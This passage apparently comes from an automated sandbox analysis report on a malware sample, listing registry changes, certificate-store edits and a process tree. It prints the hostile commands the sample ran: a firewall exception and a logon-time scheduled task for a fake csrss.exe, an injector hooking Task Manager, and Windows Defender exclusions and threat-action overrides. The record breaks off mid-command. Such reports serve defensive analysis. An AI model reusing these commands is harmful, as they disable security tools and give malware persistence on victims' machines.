| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-3052 = "Qyzylorda Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1891 = "Russia TZ 3 Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2392 = "Aleutian Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-621 = "Korea Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1042 = "Ulaanbaatar Standard Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-572 = "China Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2162 = "Altai Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" | C:\Windows\windefender.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\@tzres.dll,-791 = "SA Western Daylight Time" | C:\Windows\windefender.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" | C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 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 | C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\ulc.3.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe
"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe
"C:\Users\Admin\Pictures\v1GloRmtlH7A4ZF27q5awSsA.exe"
C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe
"C:\Users\Admin\Pictures\i5WHEvos3BIMKMpqbk2wODrZ.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe
"C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe"
C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe
"C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\ulc.0.exe
"C:\Users\Admin\AppData\Local\Temp\ulc.0.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1572 -ip 1572
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1572 -s 1020
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
"C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe" --silent --allusers=0
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x298,0x29c,0x2a0,0x274,0x2a4,0x6e68e1d0,0x6e68e1dc,0x6e68e1e8
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\pkFqx95ygiXcp9uKNIAU6KGe.exe" --version
C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe
"C:\Users\Admin\Pictures\LdUE2a32dE3B01kT9zDrukhG.exe"
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
"C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=3208 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20240419140451" --session-guid=8aaab569-435b-484d-b795-e57cfab4635d --server-tracking-blob="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 " --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=3C05000000000000
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe
C:\Users\Admin\Pictures\pkFqx95ygiXcp9uKNIAU6KGe.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x2a4,0x2a8,0x2ac,0x274,0x2b0,0x6da0e1d0,0x6da0e1dc,0x6da0e1e8
C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe
"C:\Users\Admin\Pictures\NQoLPvoFTUXvp6rQ79vpjiOS.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe"
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe" --version
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404511\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=109.0.5097.45 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x426038,0x426044,0x426050
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\ulc.3.exe
"C:\Users\Admin\AppData\Local\Temp\ulc.3.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 768 -ip 768
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 1552
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe
"C:\Users\Admin\Pictures\R84XgkwYCGHfoB3THGDD5mNW.exe"
C:\Users\Admin\AppData\Local\Temp\7zS7625.tmp\Install.exe
.\Install.exe /nxdidQZJ "385118" /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bWycNackLSywaqkmgR" /SC once /ST 14:06:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe\" em /TIsite_iduEE 385118 /S" /V1 /F
C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\windefender.exe
"C:\Windows\windefender.exe"
C:\Windows\SysWOW64\cmd.exe
cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\SysWOW64\sc.exe
sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
C:\Windows\windefender.exe
C:\Windows\windefender.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe
C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\dfpTsVC.exe em /TIsite_iduEE 385118 /S
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t 